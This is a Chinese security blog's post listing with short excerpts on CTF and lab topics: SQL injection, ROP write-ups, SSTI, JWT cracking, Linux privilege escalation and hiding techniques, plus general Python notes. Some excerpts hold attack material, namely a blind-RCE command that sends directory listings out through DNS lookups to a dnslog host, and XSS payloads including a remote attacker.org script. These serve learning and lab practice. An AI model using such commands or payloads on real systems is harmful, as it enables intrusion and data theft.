- 博客(126)
- 资源 (5)
- 收藏
- 关注
原创 r2pm -ci r2ghidra 时报错:checking pkg-config flags for r_core... no
进入目录/root/.local/share/radare2/r2pm/git/r2ghidra查看configure文件,查找报错位置。安装r2dec插件,使用pdd反编译。pdg反编译指令暂时搞不定。安装 libxxhash。
2023-06-12 11:48:37 1505
转载 sql注入之order by注入
在安恒杯看到了利用order by进行盲注,记得自己之前好像总结过order by后的注入方法,翻笔记发现确实是有一篇标题为order by注入的笔记,然而里面什么都没写。看了下详细信息,发现是17年8月11号创建的。真的是拖延症拖到忘记啊。order by是mysql中对查询数据进行排序的方法, 使用示例这里的重点在于order by后既可以填列名或者是一个数字。举个例子: id是user表的第一列的列名,那么如果想根据id来排序,有两种写法:order by盲注结合union来盲注这
2022-06-22 12:56:14 1774
原创 UnicodeDecodeError: ‘utf-8‘ codec can‘t decode byte 0xc5 in position 13: invalid continuation byte
错误:UnicodeDecodeError: 'utf-8' codec can't decode byte 0xc5 in position 13: invalid continuation byte编码错误,主要是有中的编码例如:采用utf-8解码就会报错,可以使用GBK或者是“unicode_escape”进行解码参考网址:python 导入数据错误:UnicodeDecodeError: 'utf-8' codec can't decode byte 0xb5 in position 0
2022-06-06 22:51:06 10348 2
转载 Sulley fuzzer learning
Sulley fuzzer learning---1 - 先知社区Sulley fuzzer learning---2 - 先知社区Sulley fuzzer learning---3 - 先知社区Sulley fuzzer learning---4 - 先知社区Sulley fuzzer learning---5 - 先知社区
2022-06-01 11:53:53 111
原创 m3u8加密文件原理及下载脚本
一、加密ts文件解密#EXTM3U#EXT-X-VERSION:3#EXT-X-MEDIA-SEQUENCE:0#EXT-X-ALLOW-CACHE:YES#EXT-X-TARGETDURATION:13#EXT-X-KEY:METHOD=AES-128,URI="https://j-island.net/movie/hls_key/s/857401e309d8a032c3bb18f4b09b8db2/?f=jj_20190401_hihijets_004",IV=0xaa3dcf6a7ac
2022-05-11 21:14:32 9359 2
转载 shodan python
为了开始使用Shodan的Python库,首先要确保你已经收到了API密钥。一旦完成,就可以通过以下方法来安装库:(注:API密钥可以通过注册shodan账户获得)$ easy_install shodan升级到最新版本:$ easy_install -U shodan由于向后兼容的特性,所以更新库始终是安全的。通常,库的新版本仅仅意味着有新的方法/特性可用。连接到api我们的代码中需要做的第一件事是初始化API对象:import shodanSHODAN_API_KEY
2022-04-28 21:33:01 882
转载 python中的scapy模块
文章目录 模块简介 基本用法 Scapy的基本操作 Scapy模块中的函数 Scapy模块的常用简单实例 编写端口扫描器 模块简介Scapy是一个由Python编写的强大工具,目前很多优秀的网络扫描攻击工具都使用了这个模块。也可以在自己的程序中使用这个模块来实现对网络数据包的发送、监听和解析。这个模块相对于Nmap来说,更为底层。可以更直观的了解网络中的各类扫描攻击行为。相对于Nmap来说,Scapy模块只会把收到的数据包展示给你,并不会告诉你
2022-04-26 22:00:33 1759
转载 python *args **kwargs
介绍在函数定义中,参数是指定给定函数可以接受的参数的命名实体。编程时,您可能并不知道代码的所有可能的用途,并且可能希望为将来使用该模块的程序员或者为用户与代码交互提供更多选择。我们可以通过在我们的代码中使用*args和**kwargs将可变数量的参数传递给函数。理解 *args (可变参数)在Python中,*args可以使用单星号形式作为参数将非密钥变长变量列表发送到函数。值得注意的是,星号(*)是这里的重要元素,因为这个词args是既定的常规习惯用法,尽管它不是由该语言强制执行的。
2022-04-25 21:36:20 171
转载 Python对列表去重的4种方法
Python对列表去重的4种方法列表 去重开发中对数组、列表去重是非常常见的需求,对一个list中的id进行去重,有下面几种方法,前面两种方法不能保证顺序, 后面两种方法可以保持原来的顺序。下面的代码都在Python3下测试通过, Python2下请自行测试1. 使用set的特型,python的set和其他语言类似, 是一个无序不重复元素集 1 2 3 4 orgList=[1,0,3,7,7,5] #list()方法是..
2022-04-25 21:26:33 10253
原创 java String字符串的内存地址
public class Main { public static void main(String args[]) { String s1 = "Runoob"; // String 直接创建 String s2 = "Runoob"; // String 直接创建 String s3 = s1; // 相同引用 String s4 = new String("Runoob"); /.
2022-04-21 11:00:23 2372
原创 piovt32 ROP Emporium
1、栈迁移由于某些条件限制先栈空间不足写长的ROP,需要把主要的ROP写到其他区域。在可写栈区域写一个短的ROP,完成跳转到长ROP区域,完成最终的代码执行。栈迁移有两种方法,方法一,通过两次 leave ret完成,方法二,通过控制栈顶寄存器esp,使其跳转到长ROP区域。方法一:汇编语言leave_ret指令 leave相当于mov esp ebp + pop ebp mov esp ebp操作指将ebp的值赋给esp,也就是让esp指向ebp所指的地方 pop ebp操作指将栈上ebp所指
2022-03-30 11:26:02 449
原创 x86,32位中为什么要做栈平衡。
在32位中是通过栈进行参数传递,正常函数的调用,栈中要先压入返回地址,再压入ebp。但通过溢出执行相关函数时,只压入ebp,并不压入返回地址,因此函数正常返回时,先后执行,leave,ret,就会多出栈一次,因此,需要做栈平衡 正常调用 溢出调用 leave(mov esp,ebp;pop ebp) ebp ebp ret(pop eip) 返回地址 栈平衡 esp 通过代码调试代码如下:#include &
2022-03-29 18:00:32 878
原创 ret2csu ROP Emporium
14 ret2csu参考网址[原创]ret2csu学习-Pwn-看雪论坛-安全社区|安全招聘|bbs.pediy.comROP Emporium - Ret2csu (x64) - blog.r0kithax.comROP Emporium ret2csu_白兰王的博客-CSDN博客ROP-Ret2csu详解 | 偏有宸机中级ROP之ret2csu_西杭的博客-CSDN博客WP现在的ROP Emporium一共有8题,后几道题相比过去的题有了一些变化,国内的新wp也是非常
2022-03-29 00:05:25 564
原创 ROP Emporium badchars32 wp
wp1 IDA进行分析发现溢出函数1、溢出函数int pwnme(){ unsigned int v1; // [esp+0h] [ebp-38h] unsigned int i; // [esp+4h] [ebp-34h] unsigned int j; // [esp+8h] [ebp-30h] char v4[36]; // [esp+10h] [ebp-28h] BYREF setvbuf(stdout, 0, 2, 0); puts("badchars..
2022-03-26 10:27:41 711
原创 ROP Emporium-write432 wp
write432 wpwp:ROPEmporium-WriteUp - ios's blogROP Emporium一系列题_Gzero__的博客-CSDN博客在以上的wp中,在usefulFunction函数中使用的是system函数,但是我拿到的题目中,在该函数中是print_file 函数,如下:int usefulFunction(){ return print_file("nonexistent");}所以只能自己一步一步测试。在write4 challeng
2022-03-24 21:22:41 348
原创 linux系统提权参考
1、实战Linux下三种不同方式的提权技巧 - 安全客,安全资讯平台2、对Linux 提权的简单总结:https://xz.aliyun.com/t/79243、Basic Linux Privilege Escalation - g0tmi1k4、GTFOBins
2021-12-09 22:09:32 211
原创 VulnHub breach1.0
配置靶机网络作者提示:The VM is configured with a static IP address (192.168.110.140) so you will need to configure your host-only adaptor to this subnet.意思是靶机已经配置了静态IP地址为192.168.110.140,所以为了和靶机通行需要把kali主机的网卡设置一下。这里在virtualbox中可以配置一块新的网卡,为了在同一地址段,设置如下。然后让靶机和kali
2021-12-03 19:25:46 420
原创 kali的virtualbox、vm镜像账号密码
下载最新版本kali的virtualbox、vm镜像默认账号密码 root 密码 toor或者默认账号密码 kali密码kali
2021-11-28 17:38:59 8662
转载 Web中常见的绕过和技巧
参考文献Web中常见的绕过和技巧 - mrhonest - 博客园SQL注入十六进制绕过引号 slect table_name from information_schema.table where table_schema="sqli"; slect table_name from information_schema.table where table_schema=0x73716c69; slect table_name from information_.
2021-10-15 21:00:23 989
原创 零组文库,想用的抓紧
零组文库已经是关闭了,在网上找到了一个备份站点:主页 · 资料文库网页太多,就写了个脚本,但是,太多的请求访问,结果就访问不了了,脚本如下#!C:\Python3.7# -*- coding:utf-8 -*-import requestsfrom lxml import etreeimport osimport redef get_date(url): try: req =requests.get(url) req.encoding
2021-09-30 20:05:20 1444
原创 lkwa-blind-rce盲打rce
1、blind-rce因为是盲打,数据不能带出,因此采用dns查询的方式把数据带出到dns服务器上。采用dnslog站点:http://www.dnslog.cn/在盲打界面输入指令ping `whoami`.5w8un1.dnslog.cn提交后到dnslog中刷新记录可以看到如下图中所示用户为“application”针对根目录测试ls / | awk -F' ' '{system("ping -c 2 "NR".5w8un1.dnslog....
2021-05-26 14:55:50 539
转载 Pikachu靶场----答案集合
题记 这个靶场是在内推圈爷一个采访在顺风的一个安全小哥视频里那个小哥分享的,巧的是我当时正在找靶场,真是感觉有时候一些事情很奇妙,你刚好需要的时候它正好出现。此靶场名为皮卡丘靶场,可爱中透着一股霸气,搭建环境为phpstudy+mysql。可以在靶场里面玩玩kali,菜刀等高级渗透。我搭建的虚拟环境有win10,win8,linux。 这篇文章属于我在网上查找的比较好的这个靶场答案解析,用于“日”后查阅。不定期更新。 Pikachu靶场----X...
2021-04-30 14:28:13 1243
原创 xss测试语句及测试站点总结
利用方法Script 标签Script 标签可以用于定义一个行内的脚本或者从其他地方加载脚本:<script>alert("XSS")</script><script src="http://attacker.org/malicious.js"></script>Src属性<img src=x onerror=prompt(1);><img/src=aaa.jpg onerror=prompt(1);><vi.
2021-04-09 09:31:09 4131
转载 linux下的几种隐藏技术
https://blog.csdn.net/whatday/article/details/1027541400x00 前言攻击者在获取服务器权限后,会通过一些技巧来隐藏自己的踪迹和后门文件,本文介绍Linux下的几种隐藏技术。0x01 隐藏文件Linux 下创建一个隐藏文件:touch .test.txttouch 命令可以创建一个文件,文件名前面加一个 点 就代表是隐藏文件,如下图:一般的Linux下的隐藏目录使用命令ls -l是查看不出来的,只能查看到文件及文件..
2021-03-10 09:44:27 327
转载 SSTI/沙盒逃逸详细总结
一 flask1 、基本用法>>> [].__class__.__base__<class 'object'>>>> [].__class__.__mro__(<class 'list'>, <class 'object'>)>>> [].__class__.__bases__(<class 'object'>,)2、取子类[].__class__.__base__.__sub
2021-03-09 20:13:57 1111
原创 GDB调试 | PWNDBG+PWNDBG联合使用
GDB调试 | PWNDBG+PWNDBG联合使用https://www.freesion.com/article/7871636857/本机调试:1、安装好pwndbg后在“~”目录有“.gdbinit”文件内容:# cat .gdbinitsource /home/giantbranch/pwndbg/gdbinit.py2、安装好Pwngdb后需要将该目录下的“.gdbinit”覆盖原来的".gdbinit"cd ~/git clone https://gith
2021-02-25 21:47:05 1125
转载 栈基本原理
栈溢出原理和利用学习https://blog.csdn.net/sinat_31054897/article/details/82223889函数调用过程中函数栈详解https://blog.csdn.net/u012218309/article/details/81669227
2021-02-21 22:04:42 103
转载 php伪协议实现命令执行的七种姿势
首先归纳下常见的文件包含函数:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file,计划对文件包含漏洞与php封装协议的利用方法进行总结,本篇先总结下一些封装协议,涉及的相关协议:file://、php://filter、php://input、zip://、compress.bzip2://、compress.zlib://、data:/
2021-01-26 09:37:26 256
转载 CTFHUB-技能树-WEB通关
CTFHUB-技能树-WEB通关https://blog.csdn.net/qq_45774670/article/details/109568987ctfhub 技能树web全部做题记录(已完结)(除web进阶)https://blog.csdn.net/weixin_45485719/article/details/104958537
2021-01-25 21:02:00 331 1
原创 ctfhub 技能树 JSON Web Token 修改签名算法
1、题目提示:有些JWT库支持多种密码算法进行签名、验签。若目标使用非对称密码算法时,有时攻击者可以获取到公钥,此时可通过修改JWT头部的签名算法,将非对称密码算法改为对称密码算法,从而达到攻击者目的。2、打开题目看到题目给的源码,源码如下,<?phprequire __DIR__ . '/vendor/autoload.php';use \Firebase\JWT\JWT;class JWTHelper { public static function encode($pay
2021-01-23 10:17:33 5110 3
原创 ctfhub 技能树 JSON Web Token 弱秘钥
1、题目提示:如果JWT采用对称加密算法,并且密钥的强度较弱的话,攻击者可以直接通过蛮力攻击方式来破解密钥。尝试获取flag2、burpsuit抓包3、获取token进行暴力破解eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJwYXNzd29yZCIsInJvbGUiOiJndWVzdCJ9.xCCx-8iRz4HybhQ5iz3zHLniJ5koa7iflMALlaos6ic
2021-01-21 00:12:06 4418 2
原创 如何查看网页的编码格式
最近在做爬虫的时候,发现部分网页爬出来的数据是乱码(网易新闻)。 搞了半天,最后发现网易新闻的编码格式是GBK不是UTF-8。 查看网页的编码格式的方法就是:1、在网页按F12,打开开发者工具2、在console 中输入“document.charset”查看页面编码,如下》document.charset》"UTF-8"3、设置spider的编码格式python req = requests.get(url) req.encoding="UTF-8"参考
2021-01-18 20:40:26 6335 2
转载 【tool】中国蚁剑(AntSword)下载、安装、使用教程
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。通俗的讲:中国蚁剑是 一 款比菜刀还牛的shell控制端软件。中国蚁剑推崇模块化的开发思想,遵循开源,就要开得漂亮的原则,致力于为不同层次的人群提供最简单易懂、方便直接的代码展示及其修改说明,努力让大家可以一起为这个项目贡献出力所能及的点滴,让这款工具真正能让大家用得顺心、舒适,让它能为大家施展出最人性化最适合你的能力!一、中国蚁剑下载唯一官方github下载地址:https://gi
2021-01-16 20:35:44 2109
转载 Ubuntu 18.04如何设置永久DNS域名服务
欢迎转载,但请注明出处近日,使用Ubuntu18.04的过程中想更改一下系统的DNS服务。但是上网找寻所对应的方法良久,这些方法要么对应上一个稳定版本(16.04),要么无效,而且上述博文存在相互抄袭、风马牛不相及的粗鄙现象,质量良莠不齐。赶巧,今日赋闲在家,抽空小记于此,以备有缘人剔除糟粕,取其优而匡其劣。实践方法1、安装resolvconf 包sudo apt install resolvconf12、编辑/etc/resolvconf/resolv.conf.d/head 文
2021-01-16 17:27:59 2782 6
转载 Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写
https://blog.csdn.net/mysteryflower/article/details/94386461https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html#fastcgi-record
2021-01-12 10:42:26 179
get-pip.py
2020-08-30
TraceMe.rar
2020-08-29
pixtopianbook107.rar
2020-08-29
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人